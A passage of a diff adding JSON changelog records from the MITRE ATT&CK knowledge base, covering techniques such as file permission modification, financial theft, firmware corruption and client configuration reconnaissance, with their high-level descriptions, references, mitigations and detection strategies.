+                        "Austin Clark, @c2defense"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.7",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.644000+00:00\", \"old_value\": \"2025-10-24 17:49:00.036000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.7",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0370: Recursive Enumeration of Files and Directories Across Privilege Contexts"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-10-17 00:14:20.652000+00:00",
+                    "modified": "2026-05-12 15:12:00.637000+00:00",
+                    "name": "File and Directory Permissions Modification",
+                    "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory\u2019s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).\n\nAdversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1222",
+                            "external_id": "T1222"
+                        },
+                        {
+                            "source_name": "falconoverwatch_blackcat_attack",
+                            "description": "Falcon OverWatch Team. (2022, March 23). Falcon OverWatch Threat Hunting Contributes to Seamless Protection Against Novel BlackCat Attack. Retrieved May 5, 2022.",
+                            "url": "https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/"
+                        },
+                        {
+                            "source_name": "Hybrid Analysis Icacls1 June 2018",
+                            "description": "Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.",
+                            "url": "https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100"
+                        },
+                        {
+                            "source_name": "Hybrid Analysis Icacls2 May 2018",
+                            "description": "Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.",
+                            "url": "https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110"
+                        },
+                        {
+                            "source_name": "bad_luck_blackcat",
+                            "description": "Kaspersky Global Research & Analysis Team (GReAT). (2022). A Bad Luck BlackCat. Retrieved May 5, 2022.",
+                            "url": "https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf"
+                        },
+                        {
+                            "source_name": "fsutil_behavior",
+                            "description": "Microsoft. (2021, September 27). fsutil behavior. Retrieved January 14, 2022.",
+                            "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior"
+                        },
+                        {
+                            "source_name": "blackmatter_blackcat",
+                            "description": "Pereira, T. Huey, C. (2022, March 17). From BlackMatter to BlackCat: Analyzing two attacks from one affiliate. Retrieved May 5, 2022.",
+                            "url": "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html"
+                        },
+                        {
+                            "source_name": "new_rust_based_ransomware",
+                            "description": "Symantec Threat Hunter Team. (2021, December 16). Noberus: Technical Analysis Shows Sophistication of New Rust-based Ransomware. Retrieved January 14, 2022.",
+                            "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "CrowdStrike Falcon OverWatch",
+                        "Jan Miller, CrowdStrike"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.637000+00:00\", \"old_value\": \"2026-04-16 20:07:53.078000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1026: Privileged Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0299: Multi-Platform File and Directory Permissions Modification Detection Strategy"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-04 19:24:27.774000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Linux and Mac Permissions",
+                    "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nMost Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform\u2019s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: <code>chown</code> (short for change owner), and <code>chmod</code> (short for change mode).\n\nAdversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1222/002",
+                            "external_id": "T1222.002"
+                        },
+                        {
+                            "source_name": "Hybrid Analysis Icacls1 June 2018",
+                            "description": "Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.",
+                            "url": "https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100"
+                        },
+                        {
+                            "source_name": "Hybrid Analysis Icacls2 May 2018",
+                            "description": "Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.",
+                            "url": "https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110"
+                        },
+                        {
+                            "source_name": "20 macOS Common Tools and Techniques",
+                            "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.",
+                            "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2026-04-22 15:51:53.173000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1026: Privileged Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0351: Unix-like File Permission Manipulation Behavioral Chain Detection Strategy"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-04 19:17:41.767000+00:00",
+                    "modified": "2026-05-12 15:12:00.625000+00:00",
+                    "name": "Windows Permissions",
+                    "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nWindows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)\n\nAdversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1222/001",
+                            "external_id": "T1222.001"
+                        },
+                        {
+                            "source_name": "Hybrid Analysis Icacls1 June 2018",
+                            "description": "Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.",
+                            "url": "https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100"
+                        },
+                        {
+                            "source_name": "Hybrid Analysis Icacls2 May 2018",
+                            "description": "Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.",
+                            "url": "https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110"
+                        },
+                        {
+                            "source_name": "Microsoft Access Control Lists May 2018",
+                            "description": "M. Satran, M. Jacobs. (2018, May 30). Access Control Lists. Retrieved February 4, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists"
+                        },
+                        {
+                            "source_name": "Microsoft DACL May 2018",
+                            "description": "Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19, 2018.",
+                            "url": "https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.625000+00:00\", \"old_value\": \"2026-04-22 15:51:17.272000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1026: Privileged Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0418: Windows DACL Manipulation Behavioral Chain Detection Strategy"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-08-18 20:50:04.222000+00:00",
+                    "modified": "2026-05-12 15:12:00.685000+00:00",
+                    "name": "Financial Theft",
+                    "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1684/001) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1657",
+                            "external_id": "T1657"
+                        },
+                        {
+                            "source_name": "VEC",
+                            "description": "CloudFlare. (n.d.). What is vendor email compromise (VEC)?. Retrieved September 12, 2023.",
+                            "url": "https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/#:~:text=Vendor%20email%20compromise%2C%20also%20referred,steal%20from%20that%20vendor%27s%20customers."
+                        },
+                        {
+                            "source_name": "Crowdstrike-leaks",
+                            "description": "Crowdstrike. (2020, September 24). Double Trouble: Ransomware with Data Leak Extortion, Part 1. Retrieved December 6, 2023.",
+                            "url": "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/"
+                        },
+                        {
+                            "source_name": "Mandiant-leaks",
+                            "description": "DANIEL KAPELLMANN ZAFRA, COREY HIDELBRANDT, NATHAN BRUBAKER, KEITH LUNDEN. (2022, January 31). 1 in 7 OT Ransomware Extortion Attacks Leak Critical Operational Technology Information. Retrieved August 18, 2023.",
+                            "url": "https://www.mandiant.com/resources/blog/ransomware-extortion-ot-docs"
+                        },
+                        {
+                            "source_name": "DOJ-DPRK Heist",
+                            "description": "Department of Justice. (2021). 3 North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyber-attacks and Financial Crimes Across the Globe. Retrieved August 18, 2023.",
+                            "url": "https://www.justice.gov/usao-cdca/pr/3-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyber-attacks-and"
+                        },
+                        {
+                            "source_name": "FBI-BEC",
+                            "description": "FBI. (2022). FBI 2022 Congressional Report on BEC and Real Estate Wire Fraud. Retrieved August 18, 2023.",
+                            "url": "https://www.fbi.gov/file-repository/fy-2022-fbi-congressional-report-business-email-compromise-and-real-estate-wire-fraud-111422.pdf/view"
+                        },
+                        {
+                            "source_name": "FBI-ransomware",
+                            "description": "FBI. (n.d.). Ransomware. Retrieved August 18, 2023.",
+                            "url": "https://www.cisa.gov/sites/default/files/Ransomware_Trifold_e-version.pdf"
+                        },
+                        {
+                            "source_name": "AP-NotPetya",
+                            "description": "FRANK BAJAK AND RAPHAEL SATTER. (2017, June 30). Companies still hobbled from fearsome cyberattack. Retrieved August 18, 2023.",
+                            "url": "https://apnews.com/article/russia-ukraine-technology-business-europe-hacking-ce7a8aca506742ab8e8873e7f9f229c2"
+                        },
+                        {
+                            "source_name": "Internet crime report 2022",
+                            "description": "IC3. (2022). 2022 Internet Crime Report. Retrieved August 18, 2023.",
+                            "url": "https://www.ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf"
+                        },
+                        {
+                            "source_name": "BBC-Ronin",
+                            "description": "Joe Tidy. (2022, March 30). Ronin Network: What a $600m hack says about the state of crypto. Retrieved August 18, 2023.",
+                            "url": "https://www.bbc.com/news/technology-60933174"
+                        },
+                        {
+                            "source_name": "wired-pig butchering",
+                            "description": "Lily Hay Newman. (n.d.). \u2018Pig Butchering\u2019 Scams Are Now a $3 Billion Threat. Retrieved August 18, 2023.",
+                            "url": "https://www.wired.com/story/pig-butchering-fbi-ic3-2022-report/"
+                        },
+                        {
+                            "source_name": "NYT-Colonial",
+                            "description": "Nicole Perlroth. (2021, May 13). Colonial Pipeline paid 75 Bitcoin, or roughly $5 million, to hackers.. Retrieved August 18, 2023.",
+                            "url": "https://www.nytimes.com/2021/05/13/technology/colonial-pipeline-ransom.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Blake Strom, Microsoft Threat Intelligence",
+                        "Pawel Partyka, Microsoft Threat Intelligence",
+                        "Menachem Goldstein"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_impact_type": [
+                        "Availability"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.685000+00:00\", \"old_value\": \"2026-04-17 16:12:12.496000+00:00\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1018: User Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0495: Detection Strategy for Financial Theft"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-04-12 18:28:15.451000+00:00",
+                    "modified": "2026-05-12 15:12:00.724000+00:00",
+                    "name": "Firmware Corruption",
+                    "description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.\n\nIn general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485). ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1495",
+                            "external_id": "T1495"
+                        },
+                        {
+                            "source_name": "cisa_malware_orgs_ukraine",
+                            "description": "CISA. (2022, April 28). Alert (AA22-057A) Update: Destructive Malware Targeting Organizations in Ukraine. Retrieved July 29, 2022.",
+                            "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a"
+                        },
+                        {
+                            "source_name": "dhs_threat_to_net_devices",
+                            "description": "U.S. Department of Homeland Security. (2016, August 30). The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations. Retrieved July 29, 2022.",
+                            "url": "https://cyber.dhs.gov/assets/report/ar-16-20173.pdf"
+                        },
+                        {
+                            "source_name": "MITRE Trustworthy Firmware Measurement",
+                            "description": "Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.",
+                            "url": "http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research"
+                        },
+                        {
+                            "source_name": "Symantec Chernobyl W95.CIH",
+                            "description": "Yamamura, M. (2002, April 25). W95.CIH. Retrieved April 12, 2019.",
+                            "url": "https://web.archive.org/web/20190508170055/https://www.symantec.com/security-center/writeup/2000-122010-2655-99"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_impact_type": [
+                        "Availability"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.724000+00:00\", \"old_value\": \"2025-10-24 17:49:37.207000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1046: Boot Integrity",
+                            "M1051: Update Software"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0167: Firmware Modification via Flash Tool or Corrupted Firmware Upload"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-02 16:47:16.719000+00:00",
+                    "modified": "2026-05-12 15:12:00.642000+00:00",
+                    "name": "Client Configurations",
+                    "description": "Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "reconnaissance"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1592/004",
+                            "external_id": "T1592.004"
+                        },
+                        {
+                            "source_name": "ATT ScanBox",
+                            "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.",
+                            "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks"
+                        },
+                        {
+                            "source_name": "ThreatConnect Infrastructure Dec 2020",
+                            "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.",
+                            "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.642000+00:00\", \"old_value\": \"2025-10-24 17:48:58.431000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0820: Detection of Client Configurations"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
